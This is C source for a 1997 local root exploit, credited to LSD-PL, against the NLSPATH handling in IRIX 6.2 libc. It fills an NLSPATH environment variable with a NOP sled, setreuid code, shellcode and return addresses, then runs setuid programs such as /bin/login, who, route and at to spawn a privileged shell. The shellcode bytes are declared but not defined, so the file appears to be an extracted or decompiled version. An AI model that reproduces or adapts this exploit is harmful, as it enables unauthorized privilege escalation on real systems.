
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int NOPNUM ;
 int TMPNUM ;
 int execle (char*,char*,char*,char**,...) ;
 int exit (int) ;
 scalar_t__ jump ;
 int * nop ;
 int printf (char*,...) ;
 void** setreuidcode ;
 void** shellcode ;
 int sprintf (char*,char*) ;
 int strcmp (char*,char*) ;
 int strlen (void**) ;
 unsigned long stub1 () ;
 unsigned long stub2 () ;

main(int argc,char **argv){
    char buffer[10000],adr[4],tmp[4],*b,*envp[2];
    int i,n=-1;

    printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
    printf("libc.so $NLSPATH for irix 6.2 IP:17,19,20,21,22\n\n");

    if(argc!=2){
        printf("usage: %s {login|who|netprint|ordist|cancel|route|"
            "at}\n",argv[0]);
        exit(-1);
    }
    if(!strcmp(argv[1],"login")) n=0;
    if(!strcmp(argv[1],"who")) n=1;
    if(!strcmp(argv[1],"netprint")) n=2;
    if(!strcmp(argv[1],"ordist")) n=3;
    if(!strcmp(argv[1],"cancel")) n=4;
    if(!strcmp(argv[1],"route")) n=5;
    if(!strcmp(argv[1],"at")) n=6;
    if(n==-1) exit(-1);

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8492+1800;
    *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+8492-1024;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"NLSPATH=");
    b+=8;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b++=0xff;
    for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    switch(n){
    case 0: execle("/bin/login","lsd",0,envp);
    case 1: execle("/sbin/who","lsd",0,envp);
    case 2: execle("/usr/lib/print/netprint","lsd",0,envp);
    case 3: execle("/usr/bsd/ordist","lsd",0,envp);
    case 4: execle("/usr/bin/cancel","lsd",0,envp);
    case 5: execle("/usr/etc/route","lsd","add",0,envp);
    case 6: execle("/usr/bin/at","lsd","bzz",0,envp);
    }
}
